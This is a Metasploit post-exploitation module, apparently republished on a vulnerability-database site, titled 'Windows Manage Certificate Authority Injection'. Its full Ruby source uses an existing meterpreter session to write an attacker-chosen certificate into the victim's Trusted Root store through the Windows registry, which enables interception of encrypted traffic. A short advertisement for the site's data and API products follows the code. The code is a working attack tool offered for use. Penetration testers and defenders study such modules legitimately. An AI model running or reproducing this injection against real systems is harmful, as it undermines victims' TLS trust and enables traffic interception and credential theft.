##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Post
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Windows Manage Certificate Authority Injection',
'Description' => %q{
This module allows the attacker to insert an arbitrary CA certificate
into the victim's Trusted Root store.
},
'License' => BSD_LICENSE,
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'Compat' => {
'Meterpreter' => {
'Commands' => %w[
stdapi_registry_create_key
stdapi_registry_open_key
]
}
}
)
)
register_options(
[
OptString.new('CAFILE', [ true, 'Path to the certificate you wish to install as a Trusted Root CA.', ''])
]
)
end
def run
certfile = datastore['CAFILE']
# Check file path
begin
::File.stat(certfile)
rescue StandardError
print_error('CAFILE not found')
return
end
cert = ''
# Load the file
f = ::File.open(certfile, 'rb')
cert = f.read(f.stat.size)
f.close
loadedcert = OpenSSL::X509::Certificate.new(cert)
certmd5 = Digest::MD5.hexdigest(loadedcert.to_der).scan(/../)
certsha1 = Digest::SHA1.hexdigest(loadedcert.to_der).scan(/../)
cskiray = loadedcert.extensions[0].value.gsub(/:/, '').scan(/../)
derLength = loadedcert.to_der.length.to_s(16)
if (derLength.length < 4)
derLength = "0#{derLength}"
end
derRay = derLength.scan(/../)
hexDerLength = [ derRay[1], derRay[0] ]
certder = loadedcert.to_der.each_byte.collect { |val| '%02X' % val }
bblob = [ '04', '00', '00', '00', '01', '00', '00', '00', '10', '00', '00', '00' ]
bblob += certmd5
bblob += [ '03', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
bblob += certsha1
bblob += [ '14', '00', '00', '00', '01', '00', '00', '00', '14', '00', '00', '00' ]
bblob += cskiray
bblob += [ '20', '00', '00', '00', '01', '00', '00', '00' ]
bblob += hexDerLength
bblob += [ '00', '00' ]
bblob += certder
blob = bblob.map(&:hex).pack('C*')
cleancertsha1 = certsha1.to_s.gsub(/[\s\[\\"\]]/, '').gsub(/,/, '').upcase
catree = 'HKEY_LOCAL_MACHINE\\Software\\Microsoft\\SystemCertificates\\ROOT\\Certificates'
entire_key = "#{catree}\\#{cleancertsha1}"
root_key, base_key = client.sys.registry.splitkey(entire_key)
# Perform the registry operations
# Ensure the cert doesn't already exist
begin
open_key = nil
open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ + 0x0000)
values = open_key.enum_value
if !values.empty?
print_error('Key already exists!')
return
end
rescue StandardError
open_key = nil
open_key = client.sys.registry.create_key(root_key, base_key, KEY_WRITE + 0x0000)
print_good("Successfully created key: #{entire_key}")
open_key.set_value('Blob', REG_BINARY, blob)
print_good('CA inserted!')
end
end
end
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation